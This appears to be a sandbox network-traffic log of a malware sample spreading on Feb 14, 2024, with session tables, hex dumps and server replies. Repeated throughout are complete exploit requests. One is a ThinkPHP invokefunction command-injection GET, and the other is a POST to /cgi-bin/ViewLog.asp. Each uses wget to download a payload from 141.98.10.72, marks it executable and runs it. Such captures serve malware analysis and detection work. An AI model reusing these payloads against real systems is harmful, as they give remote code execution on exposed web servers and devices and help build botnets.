                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        964192.168.2.145555095.128.109.23880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.690320015 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:08.899630070 CET308INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:09 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        965192.168.2.144984095.179.182.3380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.690444946 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:08.895699024 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        966192.168.2.144428695.213.144.23380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.697458982 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:08.910110950 CET499INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:08 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 305
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6d 78 30 34 2e 65 6e 6b 6f 64 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at mx04.enkod.ru Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        967192.168.2.145033062.29.67.788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.810054064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        968192.168.2.145237694.122.123.318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.811677933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        969192.168.2.145438894.121.120.1858080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.811738014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        970192.168.2.144210095.9.198.580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.981224060 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:09.272725105 CET364INHTTP/1.1 505 HTTP Version not supported
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 140
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        971192.168.2.1440554112.169.86.14980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:09.552983999 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:09.845673084 CET35INHTTP/1.0 301 Redirect
                                                        Feb 14, 2024 09:35:09.845685959 CET377INData Raw: 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 37 3a 33 35 3a 31 30 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74
                                                        Data Ascii: Date: Wed Feb 14 17:35:10 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to a new <a href="http://


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        972192.168.2.1460590112.78.126.4180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:09.558871984 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:09.846079111 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:09 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        973192.168.2.1434564112.223.169.22080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:09.589355946 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:09.906897068 CET517INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:35:09 GMT
                                                        Server: Wintendo 1.3.3.7
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        974192.168.2.144457031.145.67.1978080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:09.589946985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:09.853879929 CET1203INHTTP/1.1 307 Temporary Redirect
                                                        Date: Wed, 14 Feb 2024 08:35:09 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 152
                                                        Connection: close
                                                        Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                        X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                        X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        975192.168.2.1448014112.137.170.2180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:09.626518965 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:09.983264923 CET279INHTTP/1.0 400 Bad request
                                                        Server: Zscaler/6.2
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        976192.168.2.1442554112.124.54.14580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:09.648989916 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:10.032470942 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.20.1
                                                        Date: Wed, 14 Feb 2024 08:35:09 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        977192.168.2.1445318112.196.124.5880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:09.649746895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:10.022897005 CET322INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        978192.168.2.145183894.204.234.1558080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:09.939995050 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:10.293679953 CET376INHTTP/1.1 301 Moved Permanently
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'self'
                                                        X-XSS-Protection: 1; mode=block
                                                        Strict-Transport-Security: max-age=15552000
                                                        location: https://192.168.0.14:8050/cgi-bin/ViewLog.asp
                                                        Date: Wed, 14 Feb 2024 08:35:10 GMT
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=5
                                                        Transfer-Encoding: chunked
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        979192.168.2.145548662.4.9.168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:10.486846924 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:10.690566063 CET310INHTTP/1.1 403 Forbidden
                                                        Date: Wed, 14 Feb 2024 08:35:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: keep-alive
                                                        Server: nginx
